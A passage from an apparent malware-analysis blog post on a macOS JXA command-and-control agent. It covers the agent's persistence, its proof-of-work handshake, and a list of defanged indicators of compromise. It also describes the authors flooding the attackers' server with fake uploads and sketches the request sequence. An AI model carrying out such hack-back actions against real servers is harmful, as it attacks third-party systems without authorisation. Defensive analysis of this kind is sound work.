UUID</strong>. It downloads a <strong><a href="https://taoofmac.com/space/dev/javascript/jxa">JXA</a></strong> payload (&#8220;<strong>52VH</strong>&#8221;), stores it under <strong>Application Support</strong>, and ensures it runs at login via <strong>osascript</strong>, with <strong>KeepAlive</strong> enabled for automatic relaunch. Let&#8217;s see what <strong>52VH</strong> does.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_YQ6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_YQ6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_YQ6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png" width="1456" height="967" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/19ef2336-b760-4ad5-b602-af786f6dcf76_2334x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:967,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1007493,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19ef2336-b760-4ad5-b602-af786f6dcf76_2334x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_YQ6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!_YQ6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c026a10-575d-4f36-a72a-abf864de8093_2334x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After deobfuscation, we&#8217;re met with the final piece of the malware. <strong>52VH is the persistent JXA C2 agent:</strong> it fingerprints the host, polls the server, solves <strong>PoW</strong> <strong>challenges</strong>, executes remote tasks (Bash/AppleScript/JXA), and acknowledges them back to the C2. </p><p>And speaking of the devil. I haven&#8217;t forgotten about that little <strong>Proof of Work challenge </strong>the ponies decided to implement. </p><p>What do they know about <em>hard work</em>? Parasites in a weird uniform with weird haircuts. Let&#8217;s break that toy too.</p><div><hr></div><h2>Cracking open the Armadillo</h2><p>As we&#8217;ve seen before, every interaction with the <strong>C2</strong> is gated by a <strong>JSON</strong> response containing a &#8220;<em>challenge</em>&#8221; and a &#8220;<em>complexity</em>&#8221; level. By reading the code, we can see exactly how both values are calculated.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Wr0l!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Wr0l!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Wr0l!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png" width="1456" height="967" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a2d60420-3ea3-4e38-b825-7caad9c4e031_2334x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:967,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1029100,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2d60420-3ea3-4e38-b825-7caad9c4e031_2334x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Wr0l!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!Wr0l!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F836ad995-3d3d-4379-9181-dc7e7a2129f9_2334x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>First, the server expects us to calculate a &#8220;<em><a href="https://en.wikipedia.org/wiki/Cryptographic_nonce">nonce</a></em>&#8221; (a number used only once). In this case, it&#8217;s simply <strong>an</strong> <strong>incrementing integer</strong>: the malware starts at zero and keeps increasing the value until it finds one that satisfies the server&#8217;s condition, formatted as:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;a4dd3caf-2c0a-4528-8bd1-5ee7b9ea5710&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&lt;nonce&gt;-&lt;challenge&gt;</code></pre></div><p>It then computes the <strong>SHA-256 hash</strong> of that string. The server requires the resulting hash to begin with a specific number of leading zeroes in hexadecimal form. The number of required zeroes is determined by the complexity value. For example, a complexity of 1 requires the hash to start with a single &#8220;0&#8221;, while a complexity of 3 requires three leading zeroes.</p><p>Because cryptographic hashes are <strong>unpredictable</strong>, the only way to find a valid nonce is through <strong>brute force</strong>. The implant starts at zero and increments upward until the hash output meets the requirement. Once a valid nonce is found, it <strong>sends the solution</strong> back to the server and <strong>receives a token</strong>.</p><p>Now that we understand how it works, we can grab one of the modules where this calculation is already implemented and &#8220;<em>neuter</em>&#8221; it, stripping out any harmful functionality and sanitising sensitive information, while <strong>keeping the communication logic intact</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MeU7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MeU7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 424w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 848w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 1272w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MeU7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png" width="1456" height="931" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/47281896-353a-4cbc-a47f-783f1b15ba43_2126x1360.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:931,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:425676,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F47281896-353a-4cbc-a47f-783f1b15ba43_2126x1360.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MeU7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 424w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 848w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 1272w, https://substackcdn.com/image/fetch/$s_!MeU7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4860a5-ee66-4ebf-959d-cf8364b4cc61_2126x1360.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This would allow us to <strong>arbitrarily upload fake information to their C2</strong>, effectively <strong>spamming</strong> it at will. But you know the saying:<em> new year, new me</em>. This time, <em>I choose to be the bigger person</em>.</p><p>Just kidding. <strong>Let&#8217;s terrorise those invertebrate vermin.</strong></p><p>Hardcoding different values as &#8220;<strong>REGARDS-FROM-THE-QUETZALS</strong>&#8221; and crafting a specific zip file with fake information about a fake person, we start spamming their C2 relentlessly.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mFhM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mFhM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 424w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 848w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 1272w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mFhM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png" width="1456" height="353" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:353,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:352206,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mFhM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 424w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 848w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 1272w, https://substackcdn.com/image/fetch/$s_!mFhM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc19fd4c-b7ce-4a87-a547-a31a5d17cfa3_2350x570.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>For obvious reasons, we <strong>cannot disclose</strong> that, in order to <strong>arbitrarily upload files</strong> to this campaign&#8217;s servers, you simply need to run a <strong>POST</strong> request, followed by a <strong>PUT</strong> and then another <strong>POST</strong> to the endpoints depicted in this article, using the <strong>PoW</strong> <strong>resolution</strong> <strong>method</strong> we discovered. Don&#8217;t try this at home.</p><p>Well. This edition has gone on long enough. Before we jump into the <strong>IOCs</strong>, let me remind you of the basics.</p><p><em>Stay safe.</em></p><p><em>Don&#8217;t let spies in.</em></p><p><em>Cyberbully your local threat actor.</em></p><p><em>Spread love, not malware.</em></p><p><em>And please: Don&#8217;t get rekt.</em></p><div><hr></div><h2>IOCs</h2><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;e82c3678-1a73-4b4f-b208-06523f183bbd&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">IPv4:62.60.226.225
Domain:hoplokiroute[.]com
Domain:hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev
URL:hxxps://hoplokiroute[.]com/SifFSYC0iyKGie87L0tjg
URL:hxxps://hoplokiroute[.]com/wuZpFOkrxP7ih1q9wIMVOq5pPVq
URL:hxxps://hoplokiroute[.]com/hicMvddp7NAl80BkWFES19KfRs
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/vlorKq3ETMPVqR9phyou88U7bPj7rHcqPft1yMxScQJiAOyV9BAJ8OpKO5Vw6SnG0Ok4nwS[.]aspx 
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/KqsbHMd9o7Z8AExWh1nD9mL6LXQSL8z1euhGi4PLxvPMujgNCOTbWlCrErzX9NVcwM7X2kVS[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/RBVr0mPp65COR4S6tThFCYIiK3ghS7A6BZimoZOHyf4MnmyRTjKxasnaKyZ9OKWIUy6O1hy[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/iM7SGHcIcB6ZPZJRUlsu3DRR045tUbWN4mjh2inIyhAa2sXD0U3K1xlMzBjCAAKRrvCCW0q4yS6TT65a[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/DYnBfm4yfByVEgqXSq27k67EAsq5hZeZYY8PaTAWok3YlBmi4XZeZUvkdVboEUCm1tUDqeZ[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/xFj6OFibJ2V9C2z0g9Aa7FK5vPiUNf17NK9KLs2ZrZaAuy2h8dKomXKTBbwrjtV40crW[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/Bc5Tg1EIVZYOgIJVIcV31JZUwXAhc4Hv7DIereUloKjH8Uhnw9vsQY9oq175PbclUjwm6bg52vH[.]aspx
SHA256:f5669d80eb52f8b6fc90f5c5db98182e7d5297073f120a67b22700bf88c17d27
SHA256:318792ed0fcb64059670956468d7e0ef62edb15c967cd1f13fa8774e5e5c28ae
SHA256:66c3d0eaf68dcc97c092ce48ed65df49a8dcb7e1c3e2137f98ad16826ee5ef8d
SHA256:0c47f6db79f5c4db86227b1fba4528ca8c2f8a1e86302863add8fd3f966b1b30
SHA256:e4677a8fb20517393a761c49075f0e4fdfe80f28f6bdeacb246e7d9b3858542f
SHA256:7f78ce8bd2c7e2ccd71fc62bcfb29ce5b0d91efaff4c51f629195efb0293184d
SHA256:ee93c0caa82ed4b362b1f13b230687cf403fea83f7a7e3090c9bbe08955878c4
SHA256:91c47f8ddb5a937c461bee6021569544e6fa009e103e6f34b59b9d342338b76d
FileName:/tmp/exec_throttle.lock</code></pre></div><p><strong>Important note:</strong> Some engines, such as <strong>Moonlock</strong>&#8217;s (whose work <strong>we love</strong>), detect this variant as &#8220;<em>DigitStealer</em>&#8221;. While it shares certain traits, such as using Pages[.]Dev to distribute payloads and disguising Bash scripts as ASPX files, there is little else in common so far.</p><p>On the other hand, there are several notable differences that create meaningful distance from DigitStealer: no geofencing, as the original checks for Russia and CIS countries and avoids infecting them; no modification of desktop wallet applications such as Ledger; no use of Python modules; no DNS beaconing and, most importantly, no use of Deobf-io for code obfuscation.</p><p>Also, we have confirmation from a security vendor that distribution method and traffic patterns are confidently attributed to Famous Chollima.</p><p>We therefore <em>respectfully disagree</em> with this classification.</p><p>So maybe, <strong>these guys recycled DigitStealer</strong> to build this new strain, pretty much like they did with <strong>GoLangGhostRAT</strong> to create <strong><a href="https://any.run/cybersecurity-blog/pylangghost-malware-analysis/">PyLangGhostRAT</a></strong>. </p><div><hr></div><h2>References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/699784922444c1eb0196e2fc">LevelBlue OTX - Original Intelligence Pulse by Quetzal Team.</a></p></li></ul><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DYau!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DYau!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!DYau!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!DYau!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 1272w, 